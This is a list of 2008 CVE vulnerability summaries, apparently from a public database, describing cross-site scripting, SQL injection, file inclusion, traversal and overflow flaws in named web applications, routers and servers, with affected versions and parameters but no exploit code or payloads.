[CVE-2008-1689] Stack consumption vulnerability in WebContainer.exe 1.0.0.336 and earlier in SLMail Pro 6.3.1.0 and earlier allows remote attackers to cause a denial of service (daemon crash) via a long request header in an HTTP request to TCP port 801. NOTE: some of these details are obtained from third party information.
[CVE-2008-1663] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) 2.1.10 and 2.1.11 on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-1649] Cross-site scripting (XSS) vulnerability in staticpages/easypublish/index.php in EasyNews 4.0 allows remote attackers to inject arbitrary web script or HTML via the read parameter in an edp_pupublish action.
[CVE-2008-1639] SQL injection vulnerability in index.php in Neat weblog 0.2 allows remote attackers to execute arbitrary SQL commands via the articleId parameter in a show action, probably related to the showArticle function in lib/lib_article.include.php.
[CVE-2008-1636] Cross-site scripting (XSS) vulnerability in index.php in JV2 Quick Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the f parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1634] Cross-site scripting (XSS) vulnerability in index.php in JV2 Folder Gallery 3.1 allows remote attackers to inject arbitrary web script or HTML via the image parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1630] Multiple cross-site scripting (XSS) vulnerabilities in CuteFlow 1.5.0 and 2.10.0 allow remote attackers to inject arbitrary web script or HTML via the language parameter to (1) page/showcirculation.php
[CVE-2008-1629] Cross-site scripting (XSS) vulnerability in PHPkrm before 1.5.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-1621] Multiple cross-site scripting (XSS) vulnerabilities in GeeCarts allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) show.php, (2) search.php, and (3) view.php. NOTE: the provenance of this information is unknown
[CVE-2008-1617] Double free vulnerability in Web TransferCtrl Class 8,2,1,4 (iManFile.cab), as used in WorkSite Web 8.2 before SP1 P2, allows remote attackers to execute arbitrary code via JavaScript that sets the Server property to a string, then sets the string to null.
[CVE-2008-1609] Multiple PHP remote file inclusion vulnerabilities in just another flat file (JAF) CMS 4.0 RC2 allow remote attackers to execute arbitrary PHP code via a URL in the (1) website parameter to (a) forum.php, (b) headlines.php, and (c) main.php in forum/, and (2) main_dir parameter to forum/forum.php. NOTE: other main_dir vectors are already covered by CVE-2006-7127.
[CVE-2008-1604] Cross-site scripting (XSS) vulnerability in PerlMailer before 3.02 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-1603] Cross-site scripting (XSS) vulnerability in GNB DesignForm before 3.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the email form.
[CVE-2008-1592] MQSeries 5.1 in IBM WebSphere MQ 5.1 through 5.3.1 on the HP NonStop and Tandem NSK platforms does not require mqm group membership for execution of administrative tasks, which allows local users to bypass intended access restrictions via the runmqsc program, related to "Pathway panels."
[CVE-2008-1590] JavaScriptCore in WebKit on Apple iPhone before 2.0 and iPod touch before 2.0 does not properly perform runtime garbage collection, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via unspecified vectors that trigger memory corruption, a different vulnerability than CVE-2008-2317.
[CVE-2008-1589] Safari on Apple iPhone before 2.0 and iPod touch before 2.0 misinterprets a menu button press as user confirmation for visiting a web site with a (1) self-signed or (2) invalid certificate, which makes it easier for remote attackers to spoof web sites.
[CVE-2008-1580] CFNetwork in Safari in Apple Mac OS X before 10.5.3 automatically sends an SSL client certificate in response to a web server's certificate request, which allows remote web sites to obtain sensitive information (Subject data) from personally identifiable certificates, and use arbitrary certificates to track user activities across domains, a related issue to CVE-2007-4879.
[CVE-2008-1571] Directory traversal vulnerability in the embedded web server in Image Capture in Apple Mac OS X before 10.5 allows remote attackers to read arbitrary files via directory traversal sequences in the URI.
[CVE-2008-1566] Cross-site scripting (XSS) vulnerability in Search.do in ManageEngine Applications Manager 8.x allows remote attackers to inject arbitrary web script or HTML via the query parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1560] Multiple cross-site scripting (XSS) vulnerabilities in Digiappz DigiDomain 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) domain parameter to lookup_result.asp, and the (2) word1 and (3) word2 parameters to suggest_result.asp.
[CVE-2008-1556] Multiple cross-site scripting (XSS) vulnerabilities in BolinOS 4.6.1 allow remote attackers to inject arbitrary web script or HTML via the (1) url parameter to (a) system/actionspages/_b/contentFiles/gBImageViewer.php, (2) ForEditor parameter to (b) system/actionspages/_b/contentFiles/gBselectorContents.php, (3) the PATH_INFO to (c) gBLoginPage.php and (d) gBPassword.php in system/actionspages/_b/contentFiles/, (4) formlogin parameter to system/actionspages/_b/contentFiles/gBLoginPage.php, and the (5) bolini_searchengine46Search parameter to (e) help/index.php.
[CVE-2008-1550] Multiple cross-site scripting (XSS) vulnerabilities in index.php in CubeCart 4.2.1 allow remote attackers to inject arbitrary web script or HTML via (1) the _a parameter in a searchStr action and the (2) Submit parameter.
[CVE-2008-1549] Multiple SQL injection vulnerabilities in Aeries Browser Interface (ABI) 3.8.3.14 in Eagle Software Aries Student Information System allow remote attackers to execute arbitrary SQL commands via the (1) GrdBk parameter to GradebookOptions.asp and the (2) SchlCode variable to loginproc.asp, a different vector than CVE-2008-0942.
[CVE-2008-1547] Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter.
[CVE-2008-1546] servlet/MIMEReceiveServlet in the web controller for Mitsubishi Electric GB-50 and GB-50A air-conditioning control systems allows remote attackers to cause a denial of service (air-conditioning outage) via an XML document containing a setRequest command.
[CVE-2008-1541] Directory traversal vulnerability in cgi-bin/his-webshop.pl in HIS Webshop 2.50 allows remote attackers to read arbitrary files via a .. (dot dot) in the t parameter.
[CVE-2008-1538] Cross-site scripting (XSS) vulnerability in searchAction.do in ManageEngine EventLog Analyzer 5 allows remote attackers to inject arbitrary web script or HTML via the searchText parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1536] Cross-site scripting (XSS) vulnerability in index.php in Pictures Pro (aka Tim Grissett) Photo Cart 4.1 allows remote attackers to inject arbitrary web script or HTML via the amessage parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-1515] The SOAP interface in OTRS 2.1.x before 2.1.8 and 2.2.x before 2.2.6 allows remote attackers to "read and modify objects" via SOAP requests, related to "Missing security checks."
[CVE-2008-1510] Cross-site scripting (XSS) vulnerability in system/workplace/admin/accounts/users_list.jsp in Alkacon OpenCMS 7.0.3 allows remote attackers to inject arbitrary web script or HTML via the (1) searchfilter or (2) listSearchFilter parameter.
[CVE-2008-1504] Cross-site scripting (XSS) vulnerability in setup.php3 in phpHeaven phpMyChat 0.14.5 allows remote attackers to inject arbitrary web script or HTML via the Lang parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1500] Cross-site scripting (XSS) vulnerability in index.php in TinyPortal 0.8.6 and 1.0.3 allows remote attackers to inject arbitrary web script or HTML via the PHPSESSID parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1499] Cross-site scripting (XSS) vulnerability in frontend/x/manpage.html in cPanel 11.18.3 and 11.21.0-BETA allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2008-1487] Multiple cross-site scripting (XSS) vulnerabilities in LinPHA before 1.3.3 allow remote attackers to inject arbitrary web script or HTML via (1) ftp/index.php, (2) viewer.php, (3) functions/other.php, (4) include/left_menu.class.php, and (5) plugins/stats/stats_view.php.
[CVE-2008-1485] Cross-site scripting (XSS) vulnerability in PunBB 1.2.16 and earlier allows remote attackers to inject arbitrary web script or HTML via the get_host parameter to moderate.php.
[CVE-2008-1481] Cross-site scripting (XSS) vulnerability in index.php in webSPELL 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the board parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1479] Cross-site scripting (XSS) vulnerability in index.php in cyberfrogs.net cfnetgs 0.24 allows remote attackers to inject arbitrary web script or HTML via the directory parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1477] Multiple cross-site scripting (XSS) vulnerabilities in busca.php in eForum 0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) busca and (2) link parameters.
[CVE-2008-1476] Cross-site scripting (XSS) vulnerability in Serendipity (S9Y) before 1.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to received trackbacks.
[CVE-2008-1470] Incomplete blacklist vulnerability in IISWebAgentIF.dll in the WebID RSA Authentication Agent 5.3, and possibly earlier, allows remote attackers to conduct cross-site scripting (XSS) attacks via the postdata parameter, due to an incomplete fix for CVE-2005-1118.
[CVE-2008-1468] Cross-site scripting (XSS) vulnerability in namazu.cgi in Namazu before 2.0.18 allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded input, related to failure to set the charset, a different vector than CVE-2004-1318 and CVE-2001-1350. NOTE: some of these details are obtained from third party information.
[CVE-2008-1463] Cross-site scripting (XSS) vulnerability in the management GUI in Imperva SecureSphere MX Management Server 5.0 allows remote attackers to inject arbitrary web script or HTML via an invalid or prohibited request to a web server protected by SecureSphere, which triggers injection into the "corrective action" section of an alert page.
[CVE-2008-1458] Cross-site scripting (XSS) vulnerability in index.php in CS-Cart 1.3.2 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a products search action. NOTE: it was also reported that 1.3.5-SP2 trial edition is also affected.
[CVE-2008-1446] Integer overflow in the Internet Printing Protocol (IPP) ISAPI extension in Microsoft Internet Information Services (IIS) 5.0 through 7.0 on Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to execute arbitrary code via an HTTP POST request that triggers an outbound IPP connection from a web server to a machine operated by the attacker, aka "Integer Overflow in IPP Service Vulnerability."
[CVE-2008-1432] Cross-site scripting (XSS) vulnerability in SolutionSearch.do in ManageEngine SupportCenter Plus 7.0.0 allows remote attackers to inject arbitrary web script or HTML via the searchText parameter, a related issue to CVE-2008-1299. NOTE: the provenance of this information is unknown
[CVE-2008-1428] Multiple cross-site scripting (XSS) vulnerabilities in the Ubercart 5.x before 5.x-1.0-beta7 module for Drupal allow remote attackers to inject arbitrary web script or HTML via a text attribute value for a product.
[CVE-2008-1414] Cross-site scripting (XSS) vulnerability in Multiple Time Sheets (MTS) 5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the tab parameter to (1) index.php, as demonstrated using mixed case and encoded whitespace characters in the tag
[CVE-2008-1413] Cross-site scripting (XSS) vulnerability in search.php in SNewsCMS Rus 2.1 through 2.4 allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2008-1407] SQL injection vulnerability in index.php in the WebChat 1.60 module for eXV2 allows remote attackers to execute arbitrary SQL commands via the roomid parameter.
[CVE-2008-1399] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Clansphere 2008 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the provenance of this information is unknown
[CVE-2008-1397] Check Point VPN-1 Power/UTM, with NGX R60 through R65 and NG AI R55 software, allows remote authenticated users to cause a denial of service (site-to-site VPN tunnel outage), and possibly intercept network traffic, by configuring the local RFC1918 IP address to be the same as one of this tunnel's endpoint RFC1918 IP addresses, and then using SecuRemote to connect to a network interface at the other endpoint.
[CVE-2008-1386] Multiple cross-site scripting (XSS) vulnerabilities in the installer in Serendipity (S9Y) 1.3 allow remote attackers to inject arbitrary web script or HTML via (1) unspecified path fields or (2) the database host field. NOTE: the timing window for exploitation of this issue might be limited.
[CVE-2008-1385] Cross-site scripting (XSS) vulnerability in the Top Referrers (aka referrer) plugin in Serendipity (S9Y) before 1.3.1 allows remote attackers to inject arbitrary web script or HTML via the Referer HTTP header.
[CVE-2008-1380] The JavaScript engine in Mozilla Firefox before 2.0.0.14, Thunderbird before 2.0.0.14, and SeaMonkey before 1.1.10 allows remote attackers to cause a denial of service (garbage collector crash) and possibly have other impacts via a crafted web page. NOTE: this is due to an incorrect fix for CVE-2008-1237.
[CVE-2008-1360] Cross-site scripting (XSS) vulnerability in Nagios before 2.11 allows remote attackers to inject arbitrary web script or HTML via unknown vectors to unspecified CGI scripts, a different issue than CVE-2007-5624.
[CVE-2008-1359] Cross-site scripting (XSS) vulnerability in Invision Power Board (IPB or IP.Board) 2.3.4 before 2008-03-13 allows remote attackers to inject arbitrary web script or HTML via nested BBCodes, a different vector than CVE-2008-0913.
[CVE-2008-1355] Cross-site scripting (XSS) vulnerability in index.php in Jeebles Technology Jeebles Directory 2.9.60 allows remote attackers to inject arbitrary web script or HTML via the path parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1348] Cross-site scripting (XSS) vulnerability in index.php in the eWebsite eWeather (Weather) module for PHP-Nuke allows remote attackers to inject arbitrary web script or HTML via the chart parameter to modules.php.
[CVE-2008-1347] Multiple cross-site scripting (XSS) vulnerabilities in staticpages/easygallery/index.php in MyioSoft EasyGallery 5.0tr and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO or (2) the q parameter in an about action to the help system.
[CVE-2008-1345] Cross-site scripting (XSS) vulnerability in plugins/calendar/calendar_backend.php in MyioSoft EasyCalendar 4.0tr and earlier allows remote attackers to inject arbitrary web script or HTML via the day parameter in a dayview action.
[CVE-2008-1342] Multiple cross-site scripting (XSS) vulnerabilities in the search feature in Polymita BPM-Suite and CollagePortal allow remote attackers to inject arbitrary web script or HTML via the (1) _q and (2) lucene_index_field_value parameters. NOTE: the provenance of this information is unknown
[CVE-2008-1340] Virtual Machine Communication Interface (VMCI) in VMware Workstation 6.0.x before 6.0.3, VMware Player 2.0.x before 2.0.3, and VMware ACE 2.0.x before 2.0.1 allows attackers to cause a denial of service (host OS crash) via crafted VMCI calls that trigger "memory exhaustion and memory corruption."
[CVE-2008-1326] Cross-site scripting (XSS) vulnerability in search.php in Gallarific allows remote attackers to inject arbitrary web script or HTML via the query parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1306] Multiple cross-site scripting (XSS) vulnerabilities in Savvy Content Manager (CM) allow remote attackers to inject arbitrary web script or HTML via the searchterms parameter to (1) searchresults.cfm, (2) search_results.cfm, and (3) search_results/index.cfm. NOTE: the provenance of this information is unknown
[CVE-2008-1304] Multiple cross-site scripting (XSS) vulnerabilities in WordPress 2.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) inviteemail parameter in an invite action to wp-admin/users.php and the (2) to parameter in a sent action to wp-admin/invites.php.
[CVE-2008-1300] Cross-site scripting (XSS) vulnerability in the Logfile Viewer Settings function in system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp in Alkacon OpenCms 7.0.3 and 7.0.4 allows remote attackers to inject arbitrary web script or HTML via the filePath.0 parameter in a save action, a different vector than CVE-2008-1045.
[CVE-2008-1299] Cross-site scripting (XSS) vulnerability in SolutionSearch.do in ManageEngine ServiceDesk Plus 7.0.0 Build 7011 for Windows allows remote attackers to inject arbitrary web script or HTML via the searchText parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1296] Multiple cross-site scripting (XSS) vulnerabilities in EncapsGallery 1.11.2 allow remote attackers to inject arbitrary web script or HTML via the file parameter to (1) watermark.php and (2) catalog_watermark.php in core/. NOTE: the provenance of this information is unknown
[CVE-2008-1291] ViewVC before 1.0.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to read files and list folders under the hidden CVSROOT folder.
[CVE-2008-1286] Unspecified vulnerability in Sun Java Web Console 3.0.2, 3.0.3, and 3.0.4 allows remote attackers to bypass intended access restrictions and determine the existence of files or directories via unknown vectors.
[CVE-2008-1285] Cross-site scripting (XSS) vulnerability in Sun Java Server Faces (JSF) 1.2 before 1.2_08 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-1284] Directory traversal vulnerability in Horde 3.1.6, Groupware before 1.0.5, and Groupware Webmail Edition before 1.0.6, when running with certain configurations, allows remote authenticated users to read and execute arbitrary files via ".." sequences and a null byte in the theme name.
[CVE-2008-1283] Cross-site scripting (XSS) vulnerability in Neptune Web Server 3.0 allows remote attackers to inject arbitrary web script or HTML via the URI, which is not properly handled in the 404 error page.
[CVE-2008-1273] Multiple cross-site scripting (XSS) vulnerabilities in imageVue 1.7 allow remote attackers to inject arbitrary web script or HTML via the path parameter to (1) popup.php, (2) test/dir2.php, (3) admin/upload.php, and (4) dirxml.php in upload/. NOTE: the provenance of this information is unknown
[CVE-2008-1265] The Linksys WRT54G router allows remote attackers to cause a denial of service (device restart) via a long username and password to the FTP interface.
[CVE-2008-1258] Cross-site scripting (XSS) vulnerability in prim.htm on the D-Link DI-604 router allows remote attackers to inject arbitrary web script or HTML via the rf parameter.
[CVE-2008-1257] Cross-site scripting (XSS) vulnerability in Forms/DiagGeneral_2 on the ZyXEL P-660HW series router allows remote attackers to inject arbitrary web script or HTML via the PingIPAddr parameter.
[CVE-2008-1253] Cross-site scripting (XSS) vulnerability in cgi-bin/webcm on the D-Link DSL-G604T router allows remote attackers to inject arbitrary web script or HTML via the var:category parameter, as demonstrated by a request for advanced/portforw.htm on the fwan page.
[CVE-2008-1243] Cross-site scripting (XSS) vulnerability on the Linksys WRT300N router with firmware 2.00.20, when Mozilla Firefox or Apple Safari is used, allows remote attackers to inject arbitrary web script or HTML via the dyndns_domain parameter to the default URI.
[CVE-2008-1234] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 2.0.0.13, Thunderbird before 2.0.0.13, and SeaMonkey before 1.1.9 allows remote attackers to inject arbitrary web script or HTML via event handlers, aka "Universal XSS using event handlers."
[CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
[CVE-2008-1229] Cross-site scripting (XSS) vulnerability in Edit.jsp in JSPWiki 2.4.104 and 2.5.139 allows remote attackers to inject arbitrary web script or HTML via the editor parameter, a different vector than CVE-2007-5120.b.
[CVE-2008-1228] Cross-site scripting (XSS) vulnerability in admin.php in MG2 (formerly Minigal) allows remote attackers to inject arbitrary web script or HTML via the list parameter in an import action.
[CVE-2008-1226] Multiple cross-site scripting (XSS) vulnerabilities in Zimbra Collaboration Suite (ZCS) 4.0.3, 4.5.6, and possibly other versions before 4.5.10 allow remote attackers to inject arbitrary web script or HTML via an e-mail attachment, possibly involving a (1) .jpg or (2) .gif image attachment.
[CVE-2008-1225] Multiple cross-site scripting (XSS) vulnerabilities in WebCT Campus Edition 4.1.5.8, when "Don't wrap text" is enabled, allow remote authenticated users to inject arbitrary web script or HTML via a (1) mail message or (2) discussion board message. NOTE: this might overlap CVE-2005-1076.
[CVE-2008-1224] Cross-site scripting (XSS) vulnerability in account.php in BosClassifieds Classified Ads System 3.0 allows remote attackers to inject arbitrary web script or HTML via the returnTo parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1222] Cross-site scripting (XSS) vulnerability in Dokeos 1.8.4 before SP3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-1216] IBM Lotus Quickr 8.0 server, and possibly QuickPlace 7.x, does not properly identify URIs containing cross-site scripting (XSS) attack strings, which allows remote attackers to inject arbitrary web script or HTML via a Calendar OpenDocument action to main.nsf with a Count parameter containing a JavaScript event in a malformed element, as demonstrated by an onload event in an IFRAME element.
[CVE-2008-1213] Cross-site scripting (XSS) vulnerability in Numara FootPrints for Linux 8.1 allows remote attackers to inject arbitrary web script or HTML via the Title form field when setting an appointment. NOTE: the provenance of this information is unknown
[CVE-2008-1212] Cross-site scripting (XSS) vulnerability in set_permissions.php in Podcast Generator 0.96.2 allows remote attackers to inject arbitrary web script or HTML via the scriptlang parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1211] Cross-site scripting (XSS) vulnerability in BosDates 3.x and 4.x allows remote attackers to inject arbitrary web script or HTML via (1) the type parameter in calendar.php and (2) the category parameter in calendar_search.php. NOTE: the provenance of this information is unknown
[CVE-2008-1209] Cross-site scripting (XSS) vulnerability in redirect.do in Xitex WebContent M1 allows remote attackers to inject arbitrary web script or HTML via the sid parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1208] Cross-site scripting (XSS) vulnerability in the login page in Check Point VPN-1 UTM Edge W Embedded NGX 7.0.48x allows remote attackers to inject arbitrary web script or HTML via the user parameter.
[CVE-2008-1204] Multiple cross-site scripting (XSS) vulnerabilities in the Administration Console in Sun Java System Access Manager 7.1 and 7 2005Q4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the (1) Help and (2) Version windows.
[CVE-2008-1203] The administrator interface for Adobe ColdFusion 8 and ColdFusion MX7 does not log failed authentication attempts, which makes it easier for remote attackers to conduct brute force attacks without detection.
[CVE-2008-1196] Stack-based buffer overflow in Java Web Start (javaws.exe) in Sun JDK and JRE 6 Update 4 and earlier and 5.0 Update 14 and earlier
[CVE-2008-1191] Unspecified vulnerability in Java Web Start in Sun JDK and JRE 6 Update 4 and earlier allows remote attackers to create arbitrary files via an untrusted application, a different issue than CVE-2008-1190, aka "The fifth issue."
[CVE-2008-1190] Unspecified vulnerability in Java Web Start in Sun JDK and JRE 6 Update 4 and earlier, 5.0 Update 14 and earlier, and SDK/JRE 1.4.2_16 and earlier allows remote attackers to gain privileges via an untrusted application, a different issue than CVE-2008-1191, aka the "fourth" issue.
[CVE-2008-1189] Buffer overflow in Java Web Start in Sun JDK and JRE 6 Update 4 and earlier, 5.0 Update 14 and earlier, and SDK/JRE 1.4.2_16 and earlier allows remote attackers to execute arbitrary code via unknown vectors, a different issue than CVE-2008-1188, aka the "third" issue.
[CVE-2008-1188] Multiple buffer overflows in the useEncodingDecl function in Java Web Start in Sun JDK and JRE 6 Update 4 and earlier, and 5.0 Update 14 and earlier, allow remote attackers to execute arbitrary code via a JNLP file with (1) a long key name in the xml header or (2) a long charset value, different issues than CVE-2008-1189, aka "The first two issues."
[CVE-2008-1183] Multiple cross-site scripting (XSS) vulnerabilities in Crafty Syntax Live Help (CSLH) before 2.14.6 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) livehelp.php, (2) user_questions.php, and (3) leavemessage.php. NOTE: the lostsheep.php vector is covered by CVE-2008-0848.
[CVE-2008-1182] Cross-site scripting (XSS) vulnerability in BSD Perimeter pfSense before 1.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-1180] Cross-site scripting (XSS) vulnerability in dana-na/auth/rdremediate.cgi in Juniper Networks Secure Access 2000 5.5 R1 build 11711 allows remote attackers to inject arbitrary web script or HTML via the delivery_mode parameter.
[CVE-2008-1179] Multiple cross-site scripting (XSS) vulnerabilities in include/common/javascript/color_picker.php in Centreon 1.4.2.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) title parameters. NOTE: some of these details are obtained from third party information.
[CVE-2008-1176] Cross-site scripting (XSS) vulnerability in function/sideblock.php in Affiliate Market (affmarket) 0.1 BETA allows remote attackers to inject arbitrary web script or HTML via the sideblock4 parameter.
[CVE-2008-1175] Cross-site scripting (XSS) vulnerability in AuthentiX 6.3b1 Trial allows remote attackers to inject arbitrary web script or HTML via the username parameter to aspAdmin/deleteUser.asp, a different vector than CVE-2008-1174. NOTE: the provenance of this information is unknown
[CVE-2008-1174] Cross-site scripting (XSS) vulnerability in editUser.asp in AuthentiX 6.3b1 Trial allows remote attackers to inject arbitrary web script or HTML via the username parameter.
[CVE-2008-1173] Cross-site scripting (XSS) vulnerability in account-inbox.php in TorrentTrader Classic 1.08 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2008-1168] Cross-site scripting (XSS) vulnerability in Squid Analysis Report Generator (Sarg) 2.2.3.1 allows remote attackers to inject arbitrary web script or HTML via the User-Agent header, which is not properly handled when displaying the Squid proxy log. NOTE: the provenance of this information is unknown
[CVE-2008-1165] Multiple cross-site scripting (XSS) vulnerabilities in Flyspray 0.9.9 through 0.9.9.4 allow remote attackers to inject arbitrary web script or HTML via (1) a forced SQL error message or (2) old_value and new_value database fields in task summaries, related to the item_summary parameter in a details action in index.php. NOTE: some of these details are obtained from third party information.
[CVE-2008-1162] SQL injection vulnerability in album.php in PHP WEB SCRIPT Dynamic Photo Gallery 1.02 allows remote attackers to execute arbitrary SQL commands via the albumID parameter.
[CVE-2008-1153] Cisco IOS 12.1, 12.2, 12.3, and 12.4, with IPv4 UDP services and the IPv6 protocol enabled, allows remote attackers to cause a denial of service (device crash and possible blocked interface) via a crafted IPv6 packet to the device.
[CVE-2008-1150] The virtual private dial-up network (VPDN) component in Cisco IOS before 12.3 allows remote attackers to cause a denial of service (resource exhaustion) via a series of PPTP sessions, related to the persistence of interface descriptor block (IDB) data structures after process termination, aka bug ID CSCdv59309.
[CVE-2008-1145] Directory traversal vulnerability in WEBrick in Ruby 1.8 before 1.8.5-p115 and 1.8.6-p114, and 1.9 through 1.9.0-1, when running on systems that support backslash (\) path separators or case-insensitive file names, allows remote attackers to access arbitrary files via (1) "..%5c" (encoded backslash) sequences or (2) filenames that match patterns in the :NondisclosureName option.
[CVE-2008-1131] Cross-site scripting (XSS) vulnerability in Drupal 6.0 allows remote authenticated users to inject arbitrary web script or HTML via titles in content edit forms.
[CVE-2008-1130] Unspecified vulnerability in IBM WebSphere MQ 6.0.x before 6.0.2.2 and 5.3 before Fix Pack 14 allows attackers to bypass access restrictions for a queue manager via a SVRCONN (MQ client) channel.
[CVE-2008-1129] Cross-site scripting (XSS) vulnerability in admin/users/self.php in XRMS CRM allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-1116] Insecure method vulnerability in the Web Scan Object ActiveX control (OL2005.dll) in Rising Antivirus Online Scanner allows remote attackers to force the download and execution of arbitrary code by setting the BaseURL property and invoking the UpdateEngine method. NOTE: some of these details are obtained from third party information.
[CVE-2008-1106] The management interface in Akamai Client (formerly Red Swoosh) 3322 and earlier allows remote attackers to bypass authentication via an HTTP request that contains (1) no Referer header, or (2) a spoofed Referer header that matches an approved domain, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and force the client to download and execute arbitrary files.
[CVE-2008-1098] Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.5.8 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) certain input processed by formatter/text_gedit.py (aka the gui editor formatter)
[CVE-2008-1093] Acresso InstallShield Update Agent does not properly verify the authenticity of Rule Scripts obtained from GetRules.asp web pages on FLEXnet Connect servers, which allows remote man-in-the-middle attackers to execute arbitrary VBScript code via Trojan horse Rules.
[CVE-2008-1076] Cross-site scripting (XSS) vulnerability in search.php in Interspire Shopping Cart 1.x allows remote attackers to inject arbitrary web script or HTML via the search_query parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1075] Cross-site scripting (XSS) vulnerability in index.php in Maian Cart 1.1 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter in a search command. NOTE: the provenance of this information is unknown
[CVE-2008-1068] Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2.5.1.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) Vert/index.php, (2) Noir/index.php, and (3) Bleu/index.php in template/, different vectors than CVE-2008-0645.
[CVE-2008-1064] Cross-site scripting (XSS) vulnerability in images.php in the Red Mexico RMSOFT Gallery System (GS) 2.0 module (aka rmgs) for XOOPS allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2008-1063] Cross-site scripting (XSS) vulnerability in index.php in the XM-Memberstats (xmmemberstats) module for XOOPS allows remote attackers to inject arbitrary web script or HTML via the sortby parameter.
[CVE-2008-1061] Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php
[CVE-2008-1055] Format string vulnerability in webmail.exe in NetWin SurgeMail 38k4 and earlier and beta 39a, and WebMail 3.1s and earlier, allows remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via format string specifiers in the page parameter.
[CVE-2008-1054] Stack-based buffer overflow in the _lib_spawn_user_getpid function in (1) swatch.exe and (2) surgemail.exe in NetWin SurgeMail 38k4 and earlier, and beta 39a, allows remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via an HTTP request with multiple long headers to webmail.exe and unspecified other CGI executables, which triggers an overflow when assigning values to environment variables. NOTE: some of these details are obtained from third party information.
[CVE-2008-1048] Cross-site scripting (XSS) vulnerability in manager/xmedia.php in Plume CMS 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the dir parameter.
[CVE-2008-1047] Cross-site scripting (XSS) vulnerability in tiki-edit_article.php in TikiWiki before 1.9.10.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-1045] Cross-site scripting (XSS) vulnerability in the file tree navigation function in system/workplace/views/explorer/tree_files.jsp in Alkacon OpenCMS 7.0.3 allows remote attackers to inject arbitrary web script or HTML via the resource parameter.
[CVE-2008-1043] PHP remote file inclusion vulnerability in templates/default/header.inc.php in Linux Web Shop (LWS) php User Base 1.3 BETA allows remote attackers to execute arbitrary PHP code via a URL in the menu parameter.
[CVE-2008-1042] Directory traversal vulnerability in include/body.inc.php in Linux Web Shop (LWS) php Download Manager 1.0 and 1.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the content parameter.
[CVE-2008-1041] Cross-site scripting (XSS) vulnerability in mwhois.php in Matt Wilson Matt's Whois (MWhois) allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
[CVE-2008-1039] SQL injection vulnerability in question.asp in PORAR WEBBOARD allows remote attackers to execute arbitrary SQL commands via the QID parameter.
